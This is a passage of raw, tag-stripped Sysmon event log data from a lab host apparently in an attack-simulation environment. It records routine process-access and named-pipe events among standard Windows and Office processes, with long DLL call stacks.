ows\System32\combase.dll+5df06 18141800x800000000000000078143Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.529{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078142Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.529{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078141Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.529{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078140Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.529{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000078139Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.514{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+e7c73|C:\Windows\System32\Windows.Storage.dll+e73e5|C:\Windows\System32\Windows.Storage.dll+e72f9|C:\Windows\System32\Windows.Storage.dll+e7292|C:\Windows\System32\Windows.Storage.dll+5b9fd|C:\Windows\System32\Windows.Storage.dll+ddfd6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 10341000x800000000000000078138Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.514{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60513|C:\Windows\System32\Windows.Storage.dll+5bbcc|C:\Windows\System32\Windows.Storage.dll+5bb23|C:\Windows\System32\Windows.Storage.dll+5b99b|C:\Windows\System32\Windows.Storage.dll+ddfd6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba 10341000x800000000000000078137Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.514{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ceeb|C:\Windows\System32\Windows.Storage.dll+12acc5|C:\Windows\System32\Windows.Storage.dll+ddfb8|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000078136Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.514{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12ac99|C:\Windows\System32\Windows.Storage.dll+ddfb8|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e907c 10341000x800000000000000078135Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.514{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+e7c73|C:\Windows\System32\Windows.Storage.dll+e73e5|C:\Windows\System32\Windows.Storage.dll+e72f9|C:\Windows\System32\Windows.Storage.dll+e7292|C:\Windows\System32\Windows.Storage.dll+5b9fd|C:\Windows\System32\Windows.Storage.dll+ddfd6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 10341000x800000000000000078134Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.514{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60513|C:\Windows\System32\Windows.Storage.dll+5bbcc|C:\Windows\System32\Windows.Storage.dll+5bb23|C:\Windows\System32\Windows.Storage.dll+5b99b|C:\Windows\System32\Windows.Storage.dll+ddfd6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba 10341000x800000000000000078133Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.514{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ceeb|C:\Windows\System32\Windows.Storage.dll+12acc5|C:\Windows\System32\Windows.Storage.dll+ddfb8|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000078132Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.514{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12ac99|C:\Windows\System32\Windows.Storage.dll+ddfb8|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e907c 10341000x800000000000000078131Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.514{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+e7c73|C:\Windows\System32\Windows.Storage.dll+e73e5|C:\Windows\System32\Windows.Storage.dll+e72f9|C:\Windows\System32\Windows.Storage.dll+e7292|C:\Windows\System32\Windows.Storage.dll+5b9fd|C:\Windows\System32\Windows.Storage.dll+ddfd6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 10341000x800000000000000078130Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.514{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60513|C:\Windows\System32\Windows.Storage.dll+5bbcc|C:\Windows\System32\Windows.Storage.dll+5bb23|C:\Windows\System32\Windows.Storage.dll+5b99b|C:\Windows\System32\Windows.Storage.dll+ddfd6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba 10341000x800000000000000078129Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.514{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ceeb|C:\Windows\System32\Windows.Storage.dll+12acc5|C:\Windows\System32\Windows.Storage.dll+ddfb8|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000078128Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.514{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12ac99|C:\Windows\System32\Windows.Storage.dll+ddfb8|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e907c 10341000x800000000000000078127Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.514{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078126Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.514{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078125Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.514{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078124Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.498{A7A01FEF-C0A6-607E-8105-00000000BB01}8366044C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000078123Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.498{A7A01FEF-C0A6-607E-8105-00000000BB01}8366044C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000078122Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.498{A7A01FEF-C0A6-607E-8105-00000000BB01}8366044C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078121Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.498{A7A01FEF-C0A6-607E-8105-00000000BB01}8366044C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078120Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.498{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078119Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.482{A7A01FEF-C0A6-607E-7705-00000000BB01}43486888C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ce7c|C:\Windows\System32\Windows.Storage.dll+dbd49|C:\Windows\System32\Windows.Storage.dll+dbb75|C:\Windows\System32\Windows.Storage.dll+615c6|C:\Windows\System32\combase.dll+ae6fa|C:\Windows\System32\combase.dll+a54bd|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+64de3|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000078118Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 